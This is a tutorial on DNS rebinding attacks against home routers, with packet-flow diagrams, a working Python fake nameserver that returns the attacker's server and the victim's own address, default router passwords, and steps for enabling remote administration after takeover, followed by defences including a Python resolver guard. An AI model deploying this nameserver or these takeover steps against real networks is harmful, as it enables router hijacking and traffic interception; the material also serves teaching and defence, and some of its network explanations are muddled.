Today we will get to know DNS Rebinding - Hacking Routers and Taking Names
What is DNS Rebinding?
- DNS rebinding occurs when the authoritative nameserver for a hostname answers with an IP address that is not the attacker's own web server but one inside the victim's network, generally for malicious reasons.
- The attack vector is handing the browser the client's own (router's) IP address for the attacker's hostname, so the attacker's page can make requests to the router as if they were same-origin: effectively a Cross Site Request Forgery attack against the router.
- We will be using this to 'hack' routers.
- This works because some (possibly many) consumer-grade routers are configured in such a way that, when you browse to the router's external IP address from within the local LAN, you land on the router configuration page.
- The reason this works is that the router checks only the destination address of the packet, not the interface through which it came in.
- This means that an internal host can reach the router's admin interface via the router's INTERNAL or EXTERNAL IP.
- However, an external device cannot reach the admin interface at all (without DNS rebinding or some other attack), because the router drops admin traffic arriving on the WAN interface.
Here's how it works.
Let's see it with an example ⇒
Suppose ⇒
Home User: 1.1.1.1 (a host on the LAN; 1.1.1.1 is the router's public, external address, which the whole LAN shares via NAT)
Web Server: 3.3.3.3 (example.com, attacker-controlled)
RealNameServer: 8.8.8.8
FakeNameServer: 3.3.3.3 (same as the web server; this is ns1.example.com, the authoritative nameserver for example.com)
When the browser (through the operating system's resolver) asks a DNS server for the address of a hostname, the nameserver sends back all the A records it has for that name.
1.1.1.1 Me ---> RealNameServer ::: A record for example.com
1.1.1.1 Me <--- RealNameServer ::: IPs for example.com: 3.3.3.3
Then the well-known TCP handshake, the HTTP exchange and the teardown:
1.1.1.1 Me --SYN--> WebServer 3.3.3.3
1.1.1.1 Me <--SYN/ACK-- WebServer 3.3.3.3
1.1.1.1 Me --ACK--> WebServer 3.3.3.3
1.1.1.1 Me <--HTML/JS-- WebServer 3.3.3.3
1.1.1.1 Me --FIN--> WebServer 3.3.3.3
1.1.1.1 Me <--FIN/ACK-- WebServer 3.3.3.3
1.1.1.1 Me --ACK--> WebServer 3.3.3.3
That's it! That's the absolute most basic form of a web request.
Okay, so DNS rebinding simply works like this:
Registered Nameserver: ns1.example.com [NS]
Set ns1.example.com as the nameserver for your domain at your registrar, so that every lookup of your hostname reaches your fake nameserver.
When a client requests an A record for the website, the fake nameserver answers with two IP addresses:
www.example.com [A] -~-~-~-> 3.3.3.3 , 1.1.1.1
Now that you have that set up, we're ready to begin.
When the client requests your website, it will be provided with two different IP addresses: that of your web server, and that of their own router (the public source address of the lookup).
When they connect to you, you serve them malicious HTML/JavaScript that automatically issues requests to log in to their router and perform your desired configuration changes.
1.1.1.1 Me ---> FakeNameServer ::: A record for example.com
1.1.1.1 Me <--- FakeNameServer ::: IPs for example.com: 3.3.3.3 and 1.1.1.1
As you can see, the fake nameserver takes whatever source address the query came from and appends it as a second answer, saying "use this as an IP too". (One caveat: this only works as drawn when the query reaches the fake nameserver directly from the victim's public address. If it arrives via an intermediate recursive resolver, the source address seen is the resolver's, and a real attack instead answers with a guessed internal address such as the router's LAN address, with a very short TTL.)
1.1.1.1 Me --SYN--> WebServer 3.3.3.3
1.1.1.1 Me <--SYN/ACK-- WebServer 3.3.3.3
1.1.1.1 Me --ACK--> WebServer 3.3.3.3
1.1.1.1 Me <--HTML/JS-- WebServer 3.3.3.3 *** This is MALICIOUS JAVASCRIPT
1.1.1.1 Me --FIN--> WebServer 3.3.3.3
1.1.1.1 Me <--RST-- WebServer 3.3.3.3 *** The web server now refuses further connections
1.1.1.1 Me *** So the browser falls back to the second address it was given for example.com: 1.1.1.1
1.1.1.1 Me --SYN--> Router 1.1.1.1
1.1.1.1 Me <--SYN/ACK-- Router 1.1.1.1
1.1.1.1 Me --ACK--> Router 1.1.1.1
1.1.1.1 Me <--HTML/JS-- Router 1.1.1.1 *** This is the Router Login Page
1.1.1.1 Me --FIN--> Router 1.1.1.1
1.1.1.1 Me <--FIN/ACK-- Router 1.1.1.1
1.1.1.1 Me --ACK--> Router 1.1.1.1
3.3.3.3 Malicious Webserver >>> relays requests through the malicious JavaScript running in the victim's browser >>> Router 1.1.1.1
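The fake nameserver's behaviour shown in the exchange above, as an added example that is not code from the original article: a minimal authoritative DNS responder in Python that answers any A query with two records, the attacker's web server and the source address the query came from. The addresses 3.3.3.3 and 1.1.1.1 and the hostname are the article's; the packet builder, the `serve()` function and the zero TTL are assumptions made for illustration, and the sample query is constructed inline so the helpers run offline.

```python
import socket
import struct

# Values from the article's scenario (assumed for this example):
WEB_SERVER_IP = "3.3.3.3"   # the malicious web server; ns1.example.com lives here too
TTL = 0                     # do not let anything cache the rebinding answer


def encode_name(name: str) -> bytes:
    """Encode a dotted hostname as DNS labels, e.g. www.example.com -> \\x03www\\x07example\\x03com\\x00."""
    return b"".join(bytes([len(p)]) + p.encode("ascii")
                    for p in name.rstrip(".").split(".")) + b"\x00"


def build_query(name: str, txid: int = 0x1234) -> bytes:
    """Construct an A query packet (used only to feed the responder offline)."""
    header = struct.pack("!6H", txid, 0x0100, 1, 0, 0, 0)        # RD set, one question
    return header + encode_name(name) + struct.pack("!HH", 1, 1)  # type A, class IN


def parse_question(packet: bytes):
    """Return (txid, qname, qtype, raw question section) of a single-question packet."""
    txid, _flags, qdcount, _an, _ns, _ar = struct.unpack("!6H", packet[:12])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    labels, off = [], 12
    while packet[off] != 0:
        length = packet[off]
        labels.append(packet[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length
    off += 1                                    # skip the terminating zero label
    qtype, _qclass = struct.unpack("!HH", packet[off:off + 4])
    return txid, ".".join(labels), qtype, packet[12:off + 4]


def build_rebinding_response(query: bytes, client_ip: str) -> bytes:
    """Answer an A query with two records: our web server, then the querying client's address."""
    txid, _qname, qtype, question = parse_question(query)
    ips = [WEB_SERVER_IP, client_ip] if qtype == 1 else []      # only A queries get answers
    header = struct.pack("!6H", txid, 0x8400, 1, len(ips), 0, 0)  # QR + AA: authoritative reply
    answers = b""
    for ip in ips:
        # 0xc00c is a compression pointer to the question name at offset 12
        answers += b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, TTL, 4) + socket.inet_aton(ip)
    return header + question + answers


def answer_ips(response: bytes) -> list:
    """Pull the A-record addresses back out of a response (for inspection and testing)."""
    _txid, _flags, _qd, ancount, _ns, _ar = struct.unpack("!6H", response[:12])
    _, _, _, question = parse_question(response)
    off, ips = 12 + len(question), []
    for _ in range(ancount):
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", response[off + 2:off + 12])
        rdata = response[off + 12:off + 12 + rdlen]
        if rtype == 1:
            ips.append(socket.inet_ntoa(rdata))
        off += 12 + rdlen
    return ips


def serve(bind_addr: str = "0.0.0.0", port: int = 53):
    """Run the fake nameserver: the query's source address becomes the second A record."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_addr, port))
    while True:
        data, (src_ip, src_port) = sock.recvfrom(512)
        try:
            sock.sendto(build_rebinding_response(data, src_ip), (src_ip, src_port))
        except ValueError:
            continue        # malformed or multi-question packet: ignore it
```

`serve()` needs to run (as root, port 53) on the host registered as ns1.example.com; the other helpers let you inspect the packet without a network: `answer_ips(build_rebinding_response(build_query("www.example.com"), "1.1.1.1"))` yields `["3.3.3.3", "1.1.1.1"]`. The caveat from the text applies: when the query arrives through a recursive resolver, `src_ip` is the resolver's address rather than the victim's, so a real rebinding server answers with a guessed internal address instead.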
Now the owner of the malicious web server has access to the router's login page for as long as the victim keeps the browser open.
The key to the effectiveness of DNS rebinding is that many routers ship with default passwords that users never change
(e.g. admin/admin, admin/password, root with an empty password, admin with an empty password, etc.).
Once you're in the router, enable remote administration (if available) and set a password that you know; you will then be able to log in to the router from outside.
From there, you can run the same attack over and over, sniff the network, poison the DNS cache, or mount other network attacks.
Blocking This Attack ⇒
1. Router Config:
This attack has largely been stopped or prevented by more secure router configurations.
What allows it to work is the fact that services (like the HTTP admin server on your router) are bound to all interfaces and are therefore reachable on every IP address the router has.
The router drops admin traffic arriving on the external (WAN) interface, but that doesn't matter here, because the victim is reaching the external IP from inside the LAN. The fix is to bind the admin service to the LAN address only, or to drop LAN-side packets addressed to the WAN IP.
2. DNS Pinning:
DNS pinning basically takes the first DNS response for a site and keeps it for the lifetime of the browser session.
It doesn't allow for updates. In its strict form this is deprecated, because DNS load balancing
is vitally important to major sites, and strict pinning interferes with it.
However, some sort of verification may be implemented to ensure that each address in a multi-answer DNS response actually belongs to that domain, or at least that none of them points inside the client's own network.
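One concrete form of the verification suggested above, as an added example that is not code from the original article and not any particular resolver's implementation: a resolver-side guard in Python that strips addresses inside the client's own network from upstream answers (including the client's own public address, the trick used in the example) and pins only whether a name is public or internal, not its exact address, so load balancing across public addresses keeps working while a public name can never later be rebound to an internal one. The class and method names are assumptions; the lookups in the usage note are constructed.

```python
import ipaddress


class RebindGuard:
    """Filter DNS answers before they reach the browser (assumed design, not a real resolver's).

    Rule 1: an answer set that contains any public address is a public name; internal
            addresses in it are stripped and the name is pinned as public.
    Rule 2: a name pinned as public that later resolves only to internal addresses is the
            classic rebind, so the whole answer set is refused.
    Rule 3: a name that has only ever resolved internally (split-horizon names such as a
            router's own hostname) is allowed through untouched.
    Public addresses may change freely between lookups, which is what strict pinning breaks.
    """

    def __init__(self, own_public_ip: str):
        self.own = ipaddress.ip_address(own_public_ip)   # the LAN's external address
        self.public_names = set()                        # names seen resolving to public space

    def is_internal(self, addr: str) -> bool:
        """True for anything the browser should never be sent to via an external name."""
        ip = ipaddress.ip_address(addr)
        return (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_unspecified or ip == self.own)

    def filter(self, name: str, answers: list):
        """Return (accepted, rejected) addresses for one answer set of `name`."""
        internal = [a for a in answers if self.is_internal(a)]
        public = [a for a in answers if not self.is_internal(a)]
        if public:
            # Rule 1: e.g. "3.3.3.3, 1.1.1.1" becomes "3.3.3.3"; pin the name as public.
            self.public_names.add(name)
            return public, internal
        if name in self.public_names:
            # Rule 2: previously public, now only internal: refuse everything.
            return [], internal
        # Rule 3: only ever internal, so let it through.
        return internal, []
```

With `g = RebindGuard("1.1.1.1")`, the article's answer `["3.3.3.3", "1.1.1.1"]` for www.example.com comes back as `(["3.3.3.3"], ["1.1.1.1"])`, a later answer of `["192.168.1.1"]` for the same name is refused entirely, while `router.lan` resolving to `["192.168.1.1"]` passes. Note that the guard reasons about addresses, not names, so it does not by itself verify that every address "belongs to" the domain; that part still needs data the resolver does not normally have.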
3. Simple Security Measures
Change your router's default password.
Prioritize HTTPS. With a certificate issued for the router's real hostname, a rebound request to example.com fails certificate validation because the name in the certificate does not match, so the browser tells you whether a genuinely secure connection to the right host actually exists.